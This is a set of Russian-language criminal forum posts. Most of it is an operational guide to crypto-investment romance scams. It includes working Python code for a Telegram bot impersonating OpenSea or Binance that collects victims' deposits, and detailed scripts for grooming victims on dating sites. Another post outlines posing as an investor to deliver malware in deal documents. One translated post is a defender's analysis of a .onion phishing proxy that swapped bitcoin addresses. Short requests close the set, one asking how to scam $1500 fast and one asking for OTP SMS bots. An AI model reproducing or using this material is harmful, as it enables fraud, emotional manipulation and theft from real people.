вывести значительную сумму средств, пользователи должны пройти верификацию.
Категорически запрещается иметь несколько аккаунтов, использовать скрипты,
схемы или тактики. Если какое-либо из вышеупомянутых происшествий будет
обнаружено, ваша учетная запись будет приостановлена до полного разрешения
ситуации.
При необходимости администрация оставляет за собой право запросить документы,
подтверждающие вашу личность и возраст.
По всем вопросам, связанным с выводом средств, депозитами и обменом,
обращайтесь в службу поддержки, указанную в описании бота.
Убедительно просим вас избегать излишних любезностей, а выражать свои мысли
четко и лаконично.
После принятия правил пользователю показывает главное меню.
4. Главное меню оформляйте как вам угоднее. Могу лишь подсказать что:
Для NFT это будут вкладки - NFT, Profile
Для Трейдинга - Profile, Доступные активы
Для Казино - Live выплаты, Начать играть, Личный кабинет
About, Support, Сайт, Новостной канал, Пользовательское соглашение, Лицензии - желательны, для всех ботов.
Бот по NFT написан с использованием библиотеки Aiogram
Тут будут куски кода, как и упомянал выше, чтобы было легче определиться в
пространстве.
Предлагаю разобрать схему с корней.
1. Простейший бот.
Регистрируем бота в BotFather, имя, аватарка, описание совпадает с популярной
биржей или маркетплейсом, например OpenSea(Binance/Bybit для трейдинга) и так
далее, сами знаете.
2. Импортируем необходимые модули и методы, устанавливаем соединение с ботом по токену бота, создаем обработчики сообщений и обратные вызовы для различных действий пользователя.
Обработчики сообщений отвечают на команды /start, /admin_menu, /work_menu
Бот обрабатывает добавление новой реферальной ссылки для клиента которого вы
привели.
Позволяет пользователю добавить NFT на рынок/покупать и продавать крипту, или
просмотреть информацию о своей личной учетной записи.
Позволяем пользователю перемещаться по меню, просматривать свою коллекцию NFT
и совершать транзакции.
Все пользовательские данные хранятся в файле JSON и считываются или
записываются с использованием заданных методов.
Python:Copy to clipboard
import random
from datetime import datetime
from aiogram import Bot, Dispatcher, types
from aiogram.types import (
ReplyKeyboardRemove,
ReplyKeyboardMarkup,
KeyboardButton,
InlineKeyboardMarkup,
InlineKeyboardButton,
InputMediaPhoto
)
from aiogram.utils.callback_data import CallbackData
import codecs_method
import register_method
import config_method
import inline_method
bot = Bot(token=config_method.BOT_TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(commands=['start'])
async def start(message):
db = await register_method.reg(message)
text = str(message.text)
text = text.split()
if len(text) == 2:
try:
user_ref = int(text[1])
db[user_ref]['referals'].append(int(message.from_user.id))
db[message.from_user.id]['ref_mamonta'] = user_ref
await codecs_method.write('users.json', db)
await bot.send_message(chat_id = user_ref, text = '🎆 У вас новый клиент! Link: @' + str(message.from_user.username))
except Exception as ex:
print(ex)
pass
await bot.send_message(chat_id = message.chat.id, text = '<b>Главное меню</b>', parse_mode = 'html', reply_markup = inline_method.greet_kb)
@dp.message_handler(commands=['admin_menu'])
async def start(message):
db = await register_method.reg(message)
await bot.send_message(chat_id = message.chat.id, text = '<b>👑 Админ панель</b>', parse_mode = 'html', reply_markup = inline_method.admin_kb)
@dp.message_handler(commands=['work_menu'])
async def start(message):
db = await register_method.reg(message)
me = await bot.get_me()
await bot.send_message(chat_id = message.chat.id, text = f'<b>🔎 Ваша реферальная ссылка:</b> t.me/{me.username}?start={message.from_user.id}', parse_mode = 'html', reply_markup = inline_method.mamont)
@dp.message_handler(content_types=['photo'])
async def handle_docs_photo(message):
db = await register_method.reg(message)
if db[message.from_user.id]['num'] == 'photo_id':
value = await codecs_method.open('nft.json')
value['id'] = int(value['id']) + 1
db[message.from_user.id]['photo_id'] = f'{value["id"]}.jpg'
await codecs_method.write('users.json', db)
await codecs_method.write('nft.json', value)
await message.photo[-1].download(f'{value["id"]}.jpg')
name = db[message.from_user.id]['name']
price = db[message.from_user.id]['price']
photo_id = db[message.from_user.id]['photo_id']
tag = db[message.from_user.id]['tag']
blockchain = db[message.from_user.id]['blockchain']
collection = db[message.from_user.id]['set_collection']
value[collection][name] = {'photo': photo_id, 'price': price, 'tag': tag, 'blockchain': blockchain, 'user': None}
db[message.from_user.id]['num'] = 0
await codecs_method.write('nft.json', value)
await codecs_method.write('users.json', db)
await bot.send_message(chat_id = message.from_user.id, text = '<b>✅ NFT успешно добавлена!</b>',parse_mode = 'html')
@dp.message_handler(text=['NFT 🎆'])
async def start(message):
db = await register_method.reg(message)
value = await codecs_method.open('nft.json')
lens = int(len(value)) - 1
inline_kb = InlineKeyboardMarkup()
for i in value:
if i != 'id':
inline_btn = InlineKeyboardButton(str(i), callback_data='z ' + str(i))
inline_kb.add(inline_btn)
await bot.send_photo(chat_id = message.chat.id, photo = config_method.photo_caption, caption = f'<b>🌟 На маркетплейсе доступно {lens} коллекций</b>', parse_mode = 'html', reply_markup = inline_kb)
3. Заполнение клавиатуры, удаление сообщений, добавление новых записей в базу данных JSON, открытие файла .json в режимах чтения/записи и отправка сообщений пользователям. Большинство этих функций выполняют действия, изменяя записи JSON с помощью приколов из aiogram и codecs.
Python:Copy to clipboard
@dp.callback_query_handler(text='un_invest')
async def handle_un_invest(call):
db = await register_method.reg(call)
db[call.from_user.id]['num'] = 'un_invest'
await codecs_method.write('users.json', db)
await bot.send_message(
chat_id=call.from_user.id,
text='<b>🧑💻 Введите сумму, на которую вы хотите вывести баланс</b>',
parse_mode='html'
)
@dp.callback_query_handler(text='plus_card')
async def handle_plus_card(call):
db = await register_method.reg(call)
await bot.delete_message(chat_id=call.from_user.id, message_id=call.message.message_id)
await bot.send_photo(
chat_id=call.message.chat.id,
photo=config_method.photo_caption,
caption=f'''
<b>
💵 Сумма: {db[call.from_user.id]["invest"]} RUB
💳 Номер карты: {config_method.CARD}
🌐 Отправьте на данную карту {db[call.from_user.id]["invest"]} RUB, чтобы пополнить баланс.
</b>
''',
parse_mode='html'
)
@dp.callback_query_handler(text='plus_usdt')
async def handle_plus_usdt(call):
db = await register_method.reg(call)
await bot.delete_message(chat_id=call.from_user.id, message_id=call.message.message_id)
await bot.send_photo(
chat_id=call.message.chat.id,
photo=config_method.photo_caption,
caption=f'''
<b>
💵 Сумма: {db[call.from_user.id]["invest"]} USDT
💳 Номер кошелька: {config_method.USDT}
🌐 Отправьте на данный кошелёк {db[call.from_user.id]["invest"]} USDT, чтобы пополнить баланс.
</b>
''',
parse_mode='html'
)
@dp.callback_query_handler(text='invest')
async def handle_invest(call):
db = await register_method.reg(call)
db[call.from_user.id]['num'] = 'invest'
await codecs_method.write('users.json', db)
try:
await bot.send_message(
chat_id=db[call.from_user.id]['ref_client'],
text=f'<b>🧑💻 Клиент @{call.from_user.username} собирается пополнить баланс</b>',
parse_mode='html'
)
except Exception as ex:
print(ex)
pass
await bot.send_message(
chat_id=call.from_user.id,
text='<b>🧑💻 Введите сумму, на которую вы хотите пополнить баланс</b>',
parse_mode='html'
)
@dp.callback_query_handler(text='add_collection')
async def handle_add_collection(call):
db = await register_method.reg(call)
db[call.from_user.id]['num'] = 'add_collection'
await codecs_method.write('users.json', db)
await bot.send_message(
chat_id=call.from_user.id,
text='<b>🧑💻 Введите название новой коллекции</b>',
parse_mode='html'
)
4. Определяем действия пользователя:
Пользователь отправляет сообщение боту.
Бот ищет идентификационный номер пользователя в базе данных.
Если пользователь выполняет определенное действие на основе числа, выполняется
соответствующее действие.
Наконец, база данных обновляется после каждого действия.
Выполняемые действия зависят от значения num пользователя в базе данных.
Пример значений:
add_user_balance: пользователь пополняет свой баланс. Бот добавляет сумму к
балансу и отправляет подтверждающее сообщение пользователю и пользователю,
баланс которого пополняется.
add_collection: пользователь добавляет новую коллекцию. Бот обновляет базу
данных новой коллекцией.
add_nft: пользователь добавляет новый NFT. Бот запрашивает цену NFT, а затем
тег и блокчейн, прежде чем, наконец, запросить изображение для связи с NFT.
цена: бот ждет, пока пользователь введет цену NFT.
тег: бот ожидает, пока пользователь введет тег NFT.
Блокчейн: бот ожидает, пока пользователь введет блокчейн для NFT.
photo_id: бот ожидает, пока пользователь загрузит изображение NFT.
инвестировать: пользователь хочет сделать инвестиции. Бот предлагает
пользователю выбрать способ инвестирования.
И так далее.
Python:Copy to clipboard
async def handle_price(db, message):
next_step = True
if db[message.from_user.id]['num'] == 'price' and next_step:
next_step = False
db[message.from_user.id]['num'] = 'tag'
db[message.from_user.id]['price'] = str(message.text)
await codecs_method.write('users.json', db)
await bot.send_message(chat_id=message.from_user.id, text=f'<b>👾 Введите тег для нового NFT</b>', parse_mode='html')
async def handle_tag(db, message):
next_step = True
if db[message.from_user.id]['num'] == 'tag' and next_step:
next_step = False
db[message.from_user.id]['num'] = 'blockchain'
db[message.from_user.id]['tag'] = str(message.text)
await codecs_method.write('users.json', db)
await bot.send_message(chat_id=message.from_user.id, text=f'<b>👾 Введите блокчейн для нового NFT</b>', parse_mode='html')
async def handle_blockchain(db, message):
next_step = True
if db[message.from_user.id]['num'] == 'blockchain' and next_step:
next_step = False
db[message.from_user.id]['num'] = 'photo_id'
db[message.from_user.id]['blockchain'] = str(message.text)
await codecs_method.write('users.json', db)
await bot.send_message(chat_id=message.from_user.id, text=f'<b>👾 Решающий штрих! Отправьте фотографию для NFT</b>', parse_mode='html')
async def handle_invest(db, message):
if db[message.from_user.id]['num'] == 'invest':
db[message.from_user.id]['num'] = 0
await codecs_method.write('users.json', db)
try:
next_step = False
db[message.from_user.id]['invest'] = int(message.text)
await codecs_method.write('users.json', db)
await bot.send_message(chat_id=message.from_user.id, text='<b> Выберите способ пополнения</b>', parse_mode='html', reply_markup=inline_method.invest)
except:
await bot.send_message(chat_id=message.from_user.id, text='<b>👾 Сообщение не является числом</b>', parse_mode='html')
5. Доведите куски кода до ума и вот оно - бот готов!
Кстати интересный факт:
Так, мимолётом, на такого бота нельзя наткнуться. В поиске выскакивают только
те, которые не успел скрыть сам ТГ.
Причём для меня остаётся загадкой почему ТГ просто не блокирует названия
совпадающие с реальными биржами сразу.
Далее.
В этом руководстве укажу процесс поиска клиентов без вложений с использованием
Dating утилит, таких как боты, приложения и веб-сайты.
Рекомендуемо для начинающих — ЛДВ (леодайвинчик) в Telegram.
Первым шагом является создание учетной записи путем покупки номера телефона.
Номера недороги и даже могут быть получены случайным образом в раздаче рандом
номеров на регистрацию (ну или рядом с аэропортом можете украсть пачку номеров
на будущее).
Моя платформа для покупки номеров не такая и секретная, но раскрывать всё же
не буду, хотя различные боты в ТГ по вашему желанию делают тоже самое.
После получения номера необходимо добавить в профиль имя и 3-4 фотографии.
Важно поддерживать достойный внешний вид и избегать использования вульгарных
фото и статусов. Выбор слишком привлекательных фотографий также может вызвать
подозрение у клиентов.
Далее переходим к поимке добычи.
Советую сайты знакомств. Такие, как MAMBA, Badoo, Tinder и т.д.
Однако, как я упомянал раннее, вариант ДайВинчик в ТГ тоже хорош.
Чтобы получить настоящий трафик, а не адскую др04ильню, то лучше использовать
ЛДВ в VK, а не TG. Как работать в VK думаю не стоит упомянать.
Важную роль в этом процессе играет возраст, поскольку лица моложе 25 лет
обычно не имеют достаточных средств. Рекомендуемая аудитория должна быть не
моложе 23 лет.
Возраст зависит от вашего фото.
(Однако, хочу сказать из собственного опыта, что мне пару раз попадались дети
О возрасте.
До 22 лет - можно забыть Зачастую к этому возрасту человек чисто физически не успевает заработать деньги.
22 - 35 cамый рабочий вариант, большинство клиентов этой возрастной категории, могут и свои депнуть деньги и ещё и в долг взять.
35 - 45 зачастую такого человека тяжело втянуть во что-то новое, так как он глубинно сформирован, общение с таким клиентом для кого-то может стать проблемным, нужно писать грамотно с точки зрения правил русского языка, показать свой багаж знаний, быть интересным собеседником. Показать, что сможешь стать хранителем домашнего очага.
35- 45 очень тяжело завести, так как они в большей своей части отдалены от технологий, но если получится найти человека, который будет готов попробовать, с большим шансом это будет очень крупный профит. У меня был пример, я был в тех поддержке , клиенту было около 50 лет, я запросил 5000грн, он случайно два раза оплатил. Эта категория очень тугая, тяжелая, но если вытянуть того самого клиента, с большой вероятностью огромный профит, так как они достаточно доверчивые.
В описании профиля следует обсуждать только общую информацию о себе, избегая
упоминания о доходах.
Потенциальные клиенты должны рассматривать это как учетную запись человека,
стремящегося установить новые связи.
Можно выбрать любой город, хотя более крупные города требуют от вас большего
внимания к деталям, вы в таком случае получите большую прибыль, если клиенты
попадутся на удочку.
Как только профиль будет заполнен, лайкаем или ждём лайков. Дождитесь
сообщения от потенциальных клиентов.
Рекомендуется пропускать лиц с длинными и подробными описаниями, а так же у
кого в профиле есть предупреждающие признаки потенциального опыта с такими
делами как скам.
На сайтах знакомств, или ЛДВ в VK, нужна соответствующая защита, о том как защитить себя в интернете думаю вы знаете, иначе как вы попали на этот форум?
Чтобы создать профиль для этой сайтов, можно выполнить те же действия, что и
для ЛДВ.
Стоит отметить, что анкету можно использовать как мужскую, так и женскую.
Однако важно признать, что женщины могут быть более восприимчивы к обману.
Даже когда у меня не было опыта в этой сфере, мне удалось уговорить женщину на
Мамбе вложить солидную сумму денег в трейдинг.
На сайтах ваш аккаунт со 100% вероятностью будет лететь в бан.
Всех клиентов переводите в TG.
Если клиент не переходит в TG - пропускайте.
Ваше время - стоит денег, не так ли?
Переводить клиента в TG легче всего под эгидой странного поведения сайта,
поздних уведомлений.
Рекомендуется избегать отправки одинаковых сообщений нескольким получателям, чтобы не попасть в спам, что может привести к временной блокировке аккаунта. Я сталкивался с этой проблемой несколько раз.
Что касается коммуникативных планов, то диалог с мужчиной как и с женщиной, не слишком сложен.
Изначально разговор должен вращаться вокруг интересов мужчины, которые часто
ограничиваются приземленными темами «Как дела?» , "A что ты делаешь?"
Для улучшения процесса общения рекомендуется демонстрировать свободное
владение русским языком, расставляя соответствующие знаки препинания.
Кроме того, рекомендуется использовать смайлики, так как это нравится Default
людям, и это может еще больше усилить впечатление о том, что вы настоящий
человек.
Далее - разговор должен изображать недовольное настроение с тонкими намеками
на проблему, требующую помощи.
Если человек, с которым вы общаетесь, не улавливает этих намеков, вы можете
попросить о прямой помощи, заявив что-то вроде «Вы можете мне чем-нибудь
помочь?»
При появлении запроса подробно расскажите о предполагаемой проблеме,
утверждая, что получили значительный доход на торговой платформе, но были
заблокированы из-за личной ошибки. Вы можете предложить человеку возможность
участвовать в вашей «схеме» и получать долю прибыли, используя ваши «деньги».
Существует альтернативный подход, при котором вы не просите о помощи, а вместо
этого заявляете, что очень успешно зарабатываете и довольны своим текущим
положением. Вы можете предложить помощь своему новоиспеченному другу и
заработать самостоятельно, вложив 'сюда'.
Чтобы выглядеть более убедительно, вы могли бы даже показать им приличный
баланс через отрисовку.
После получения нужного депозита, делайте с вашим клиентом что угодно.
Если клиент заработал много денег в боте - важно «искренне» поздравить вашего
нового друга с успехом, потому что это настоящие деньги в его представлении.
Рекомендуется эмоционально вкладываться в процесс.
Чтобы проверить, можно ли дальше манипулировать вашим клиентом, предлагаю
имитировать снятие средств.
Это действие определит, заслуживаете ли вы доверия с клиентской стороны или
нет.
Он может быть увидит сообщение об ошибке, если в вашем боте есть такая
функция.
На этом этапе ваш друг, вероятно, заподозрит что-то и начнет выдвигать такие
требования, как: «выведем всё мб?».
Кроме того, данное лицо может начать просить вас отправить ему часть средств,
но на этом этапе вы должны сообщить им, что это невозможно.
Причины? Любые на выбор вашей фантазии.
На этом этапе определяется, будет ли наш клиент продолжать транзакцию и стоит
ли ее продолжать.
Хочу подчеркнуть, что полагаться исключительно на одного клиента
нецелесообразно.
Далее, ваша креативность решает последующий процесс.
Под конец хочу привести примеры из различных источников, примеры не мои и взяты у людей которые занимаются этим по сей день.(всё что указывает на ботов
Как можно в переписке убедиться, что клиент подходит для дальнейшей
обработки?
Есть возможность первым же смс увидеть результат.
Например:
(ВЫ) - Расскажи о себе
Click to expand...
(Клиент) - Давай сначала ты !
Click to expand...
В такой ситуации ни в коем случае не идите на поводу, прогибайте баланс значимости в свою сторону, не идите на поводу у клиента, каждый раз когда вы идёте у него на поводу, это откладывается и он будет менее податлив.
Может быть другой вариант:
(ВЫ) - Расскажи о себе
Click to expand...
(Клиент) - Ну ты задай конкретный вопрос, а я уже расскажу.
Click to expand...
Тоже стоит задуматься , клиент изначально тяжело идёт на поводу, нужно ответить ему:
(ВЫ) - Я думаю ты взрослый человек и в состоянии сам рассказать о себе то, что считаешь нужным.
Click to expand...
Это МИНИ тест с первого же сообщения, который может показать склонен ли клиент к прогибанию, если он не следует вашему сценарию, значит склонность есть, если с легкостью отвечает на ваши вопросы , значит можно переходить к следующим проверкам.
После первого этапа мы можем начать у клиента спрашивать о его прошлых
отношениях, о том, сколько их было, чем они закончились.
Имейте ввиду, клиент может вас обманывать , важны его ответы и то, как он
мыслит.
Обязательно спросите его какими он представляет идеальные отношения. Важны его
мысли в голове. Затроньте его работу , спросите нравится ли она ему.
В начале рабочего дня сделайте видео из бота, как вы работаете в нём, чтобы
потом скидывать клиентам и показывать профит.
Добавьте к этому пару скринов, относящихся к трейдингу.
Что мы получим с этого?
1. Узнаем, 364ли ли клиента до этого.
2. Узнаем уровень заинтересованности клиента в трейдинге.
Что делать если клиенту не нужен трейдинг , ему это не интересно , но он хочет отношений с вами?
Ситуация тяжелая, однозначно, но есть методы выхода из неё.
На протяжении всего диалога вы можете погружать в клиента мысль о том, что вам
интересен только лёгкий на подъем и смелый мужчина, так как вы сами являетесь
таковой.
Необходимо с первых 10 минут общения нежно затронуть это, иначе потом будет
бессмысленно.
Как и писал выше, мы ищем тех, кто легко поддаётся, таким образом мы сможем
завиноватить клиента.
"Ну я тебе сразу же сказала, что мне нужен смелый человек , а ты решил тратить время на общение , зная , что ты трус"
Click to expand...
Преподнесите это как "тёмный лес" , через который вы хотите пройти вместе с
клиентом за руку.
Можно дословно так, как я выше описал.
Если клиент напрямую вас после всего что было выше - шлёт вас- не тратье
время, ищите нового.
Для того чтобы понять, заведётся клиент или нет, требуется от 30 минут до 2
часов.
К теме про количество денег.
Клиент должен понять одну вещь , с маленькой суммы начинать работать - нет
смысла.
Вы всегда работаете якобы с 250/300$, клиенту говорим что если сумма
первоначальная очень маленькая , то не так прибыльно работать.
Если клиент готов, но такой суммы у него нет , можете сказать что так как он
новичок , может зайти с 50/150$. Предлагайте всегда совместную сделку.
Якобы клиент будет торговать вместе с вами на своей учётной записи.
Как насчёт того чтобы открыть совместную сделку? Вместе быстрее справимся , совместный труд сближает)
Click to expand...
Если клиент согласен - пишем :
Отлично, тогда напиши в тех поддержку, что хочешь открыть совместную сделку на своей учётной записи и будет пополнение от двух человек.
Click to expand...
На этом могу закончить первую серию данной темы.
Так же можете ознакомиться с остальными темами написанными мной специально для
XSS.IS
Вопросы - задавайте,
Своих - не сдавайте,
Помните! Дядя в погонах - не проктолог, штаны - не снимайте.
Всем спасибо за просмотр, прочтение. Всем удачи и побольше депозитов!
Расскажу для новичков про СИ, а может и профи найдут для себя что-то полезное.
СИ - это неотъемлемая часть нашей профессии.
И начнем мы с доверия. Важно, чтобы нам доверяли и даже не возникало мыслей о том, что мы можем быть не теми, кем представляемся.
Для начала, нам потребуются несколько аккаунтов, для нашей инвестиционной компании.
Наша компания готова.
Идем дальше.
В LinkedIn и Twitter, в собственном аккаунте, указываем, что мы инвестор,
ментор, меценат и самый великий Ситх, так как у вас "Таков Путь".
Подписываемся на людей и группы, которые нам интересны, начинаем общаться,
ставить лайки, коменты и т.д.
В течении месяца, у вас будет достаточно юзеров для вашего дальнейшего
действия.
После, как вы уже немного известны своими высказываниями и предложениями,
можно начинать искать компанию.
Мы ищем компанию в ZoomInfo или же в OTC Markets (для меня предпочтительнее
OTC Markets, и сейчас расскажу почему).
Мы нашли для нас интересующую компанию, и приступаем к диалогу.
Я в основном беру компанию с OTC Markets, так как там в схеме будет еще участвовать брокер.(+ компания для нашего вредоноса).
Начинаем общаться с брокером, о покупке акций интересующей нас компании и
начинаем параллельно общаться с юным Энакин Скайуокер (молодой специалист по
привлечению инвестиций в компанию).
У брокера, мы узнаем всю интересующую нас информацию о компании и
перефразировав ее, передаем его юному Энакину Скайуокеру, на что он может
удивиться вашему анализу его компании (так и будет).
И так, идем дальше. Брокеру пишем, что после анализа всей компании, хотим
купить акций от 500 к до 1 млн., и хотим получить все интересующие документы
по компании.
Возвращаемся к нашему юному Энакину Скайуокеру, и предлагаем ему от 1 до 5
млн., но уже инвестиций. И так же просим информацию.
У вас вопрос.
Так зачем нам брокер, если мы можем сразу писать в нашу компанию?
Да, вопрос состоит в том, что у брокера акции не только компании, но и
инвесторов. (а это еще одна база для вас)
Когда уже оба наших сотрудника разогреты, мы начинаем документооборот (не
советую при первом документообороте прикреплять вредонос)
После обмена документами, пойдут юр. тонкости, которые обе стороны должны
исправить и внести свои корректировки.
Пока ваши "юристы" вносят исправления, мы уже общаемся не с юным Энакином
Скайуокером, а с уже с более опытным сотрудником, у которого намного больше
полномочий и доступов к системе.
Так же мы интересуемся всей инфраструктурой компании. Как инвесторам, нам не
выгодно, чтобы после наших инвестиций их взломали и мы потеряли свои вложения
ну т.д.
Все наши "юристы" подготовили документы с внесением исправлений, и готовы к
отправке (тут уже можно внедрять вредонос) и отправляем их на согласование
брокеру, юристу, директору и нашему юному Энакину Скайуокеру.
Ну, а дальше, дело техники.
Надеюсь, кому-то пригодится данная статья. Данный материал, конечно изложен без многих деталей, но это уже совсем другая история.
P.S. это первая статья на форуме не судите строго
Фишинг в клирнете сейчас обычное дело. Его легко обнаружить и также легко
предотвратить.
Но что делать при угрозе фишинга в Даркнете?
Один из владельцев сайта в зоне .onion опубликовал у себя в блоге историю о том, как его сайт пытались использовать фишеры, и как он этому сопротивлялся.
< Далее текст идет от первого лица>
Джеймс Стэнли создатель и владелец сервиса SMS Privacy. Этот сервис предназначен для анонимного приема sms-сообщений за биткоины. У этого сервиса существует зеркало в сети Tor.
Однажды эксперт по безопасности Чарли Хотерсолл-Томас обнаружил, что поиск Google для «site:*.onion.to smsprivacy» выдает неожиданный результат.
smspriv6fynj23u6.onion — это законное имя скрытого сервиса, но есть и другой результат, который выглядит одинаково: smsprivyevs6xn6z.onion
Краткое исследование показало, что сайт был простым прокси: запросы на страницы, отправленные на фишинговый сайт, были отправлены на настоящий скрытый сервис, а ответы перенаправлены назад, за исключением нескольких идиосинкразий:
Заголовок Content-Length отсутствует
Заголовок Content-Length говорит клиенту HTTP, сколько байтов контента
ожидать. Глупый прокси-сервер, который намерен передать содержимое без
изменений, может просто передать заголовок Content-Length без изменений: он
знает, что длина не изменится, если содержимое не может измениться.
То, что прокси-сервер считает, что длина содержимого может измениться, подразумевает, что сервер готов модифицировать контент в некоторых обстоятельствах.
Но почему он просто не пишет Content-Length, соответствующий модифицированной версии контента?
Возможно, чтобы уменьшить время загрузки страницы: если прокси не нужно знать длину досрочно, он может передавать контент непосредственно клиенту по мере его получения, изменяя его по мере его поступления. Если он должен был прочитать все содержимое, затем выполнить его изменения, а затем отправить все дальше, это может увеличить время загрузки страницы, что вызовет подозрение.
Возможно, автор счел, что хранение всего содержимого является неприемлемо высокой нагрузкой на память. Если тот же сервер проксирует от десятков до сотен других скрытых сервисов, это может быть разумным решением.
Заголовок Connection неверный
Ниже приведено сравнение заголовков ответов:
Code:Copy to clipboard
$ torsocks curl -I http://smspriv6fynj23u6.onion/
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 13 Oct 2017 05:37:49 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 7387
Connection: keep-alive
Set-Cookie: [...]
X-Frame-Options: DENY
Легитимный сайт
Code:Copy to clipboard
$ torsocks curl -I http://smsprivyevs6xn6z.onion/
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 13 Oct 2017 05:37:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: [object Object]
Set-Cookie: [...]
X-Frame-Options: DENY
Фишинговый сайт
Заголовок Connection изменен с keep-alive на [object Object]. Это то, что вы получаете в javascript при преобразовании объекта в строку, если объект не реализует toString(). Это может быть ключ к пониманию на каком программном обеспечении запущен прокси-сервер.
Скорее всего, он использует NodeJS. Я не смог обнаружить ничего, что могло бы вызвать эту ошибку в [node-http-proxy](https://github.com/nodejitsu/node-http- proxy) или Harmon (промежуточное программное обеспечение для node-http-proxy для изменения ответа).
Сервер кеширует файлы Javascript (и, возможно, другие).
Я добавил некоторый Javascript, чтобы определить, будет ли он запущен на
фишинговом домене. Я обнаружил, что изменения в моем скрипте были отображены в
браузере при использовании легитимного сайта, но устаревшая версия была
использована при использовании фишингового сайта, поэтому я считаю, что
фишинг-сайт делает некоторое дополнительное кеширование. Это снова может быть
связано с уменьшением времени загрузки страницы.
Я попытался исследовать это кеширование и нашел что-то еще более интересное! Прокси-сервер теперь удаляет весь контент из моего скрипта отслеживания, поэтому я не могу получить больше информации о них. Это легко устранить, переименовав скрипт и немного изменив контент, но это игра в кошки-мышки, в которую я не собираюсь играть. Как минимум, это означает, что кто-то активно наблюдает за этим прокси-сервером и предпринимает шаги для его работы.
Адрес скрытого сервиса изменен
Прокси, похоже, переписывает все экземпляры smspriv6fynj23u6.onion в
smsprivyevs6xn6z.onion.
Хотя, что интересно, он не делает то же самое для прописных букв.
Адреса биткоин-кошельков изменены
Это истинная цель фишингового сайта. Обычно фишинг-сайт будет существует для
сбора учетных данных пользователей, которые затем могут быть использованы или
проданы позже, но этот сайт использует гораздо более прямой подход, просто
переписывает адреса биткойнов на адреса, контролируемые мошенником.
При первом переходе на страницу оплаты происходит небольшая задержка до того, как страница загрузится, предположительно, в то время как бэкэнд создает новый адрес биткойна (это занимает заметное количество времени, подразумевает, что он вставляется в огромную базу данных адреса, который не имеет индексов, или генерируется на медленной машине, или создается кодом, написанным на медленном языке. Если последнее, то RNG (Генератор Случайных Чисел) небезопасен). Все адреса биткойнов, отображаемые в тексте, переписываются на адреса, контролируемые злоумышленником. Примечательно, что QR-код остается неизменным и все еще декодирует законный адрес.
Я отправил платеж одному из адресов мошенника, чтобы узнать, что произойдет: 1GM6Awv28kSfzak2Y7Pj1NRdWiXshMwdGW. Он просто не появился на сайте, что добавляет больше доверия к теории о том, что сайт в основном является глупым прокси. Деньги еще не потрачены, но было бы интересно посмотреть, куда они уйдут, если будут потрачены.
Как cайт распространяется среди пользователей?
Я видел несколько разных результатов, которые отправляют referer на сервер при
просмотре фишингового домена. В основном это были люди, просматривающие
скрытую службу через веб-прокси (например, onion.link), но я обнаружил 2
скрытых сервиса:
Я надеялся найти твит, сообщение в блоге или подобное, когда кто-то выдает фишинговую ссылку вместо реальной. Маловероятно, что люди, стоящие за «The onion crate», несут ответственность за фиш. Если бы я пытался заставить людей использовать мой фишинговый сайт, я бы не отмечал его как «фишинговую ссылку». Возможно, что люди, управляющие поисковой системой «not Evil», являются исполнителями, хотя все это маловероятно. Если бы я работал с поисковой системой с целью отправки людей на фишинг-ссылки, я бы вообще не включил легитимную ссылку в поисковую выдачу.
Возможно, что фишинговая кампания еще не началась, хотя обратите внимание, что «The onion crate» обозначил фишинг-ссылку как 2017-05-17, что означает, что она существует длительное время.
Кто несет ответственность?
Скорее всего, это злобный кибер-преступник, который написал прокси-сервер,
который заменяет адреса Биткойна своими собственными адресами, генерирует
правдоподобные скрытые служебные адреса для различных скрытых сервисов и
сидит, ожидая, когда деньги придут к нему.
Сначала я подумал, что это может быть служба разведки, надеющаяся следить за пользователями SMS Privacy. Но если вы надеялись сделать какое-то скрытое наблюдение, вы не измените адреса биткойнов до такой степени, что сайт больше не будет работать. Я предполагаю, что это может быть спроектировано, чтобы шпионить за определенным подмножеством пользователей и действовать как фишинг- сайт для всех остальных, но я думаю, что более вероятное объяснение «опытного кибер-преступника».
Фишинг скрытых сервисов гораздо проще, чем фишинг традиционных веб-сайтов, потому что нет (по дизайну) нет простого способа найти сервер скрытого сервиса, и нет централизованной системы именования, что означает, что даже у легитимных сайтов есть случайные символы в адресе. Получение правдоподобных адресов сравнительно просто. И даже после обнаружения фишингового сайта его чрезвычайно сложно закрыть. Это совершенное преступление. Единственным недостатком является то, что пользовательская база имеет тенденцию быть намного более технически подкованной, и ее не так легко обмануть, по сравнению с пользователями клирнета.
Как клиенты могут защитить себя?
Клиенты SMS Privacy должны убедиться, что они просматривают smsprivacy.org с
помощью HTTPS, или, если вы используете Tor, smspriv6fynj23u6.onion является
единственным легитимным адресом.
Кто-нибудь был обманут?
Я никогда не получал никаких писем от людей, жалующихся на то, что их платежи
пропали без вести. (Ну, это не совсем так, но в каждом случае это моя ошибка,
а не случайный просмотр фишингового сайта). Поэтому, я бы сказал, что ни один
пользователь не был обманут.
Дальнейшее расследование
Я думаю, что программное обеспечение, использующее этот прокси, также
проксирует многие другие скрытые сервисы.
На самом деле, может быть интересно найти другие фишинговые сайты и посмотреть, имеют ли они одни и те же особенности (Connection: [object Object], заголовок Content-Length удален, переписывание адреса сайта только в нижнем регистре…).
Также может быть интересно попробовать обнаружить уязвимости и посмотреть, можно ли узнать полный список скрытых сервисов, которые проксируются. Существует некая вероятность того, что выбор имени хоста выполняется в прокси- коде, что означало бы, что запрос имени хоста одного фишингового сайта может вернуть содержимое другого фишингового сайта! Это будет очень сильный показатель того, что они работают на одной машине.
Вывод
Было довольно интересно найти кого-то, кто активно это делает, и небольшая
мысль показывает, насколько легко это можно сделать в больших масштабах. Я не
удивлюсь, если в будущем появятся намного больше фишинговых сайтов.
Сорян если не тот раздел, в лс отписали мол - можно получить денег, а щас как раз ноут сгорел и надо бабки, говорит - «повбивай в лайк с айфона и кину денег за каждый акк», чёт дело пахнет писюнами, не?
Подскажите, нужны типо форумы\чаты со скамерами, темщиками и тд
Дорогие форумчане, у меня только 1 вопрос:
Как быстренько поднять 1500$?
Кого и как на#бать без особых усилий? (конечно же без работы
по)
Сам плаваю в нескольких дарк сферах, и обычно такая сумма у меня получается за
месяц, но сейчас есть некоторый дедлайн и деньги нужны как никогда ранее.
Буду очень рад услышать что-то интересное прямо в теме или pm
PS. Я человек благодарный, так что можно будет рассчитывать на хорошее
вознаграждение
Подскажите сервисы отп смс ботов
Suggest services otp sms bot's
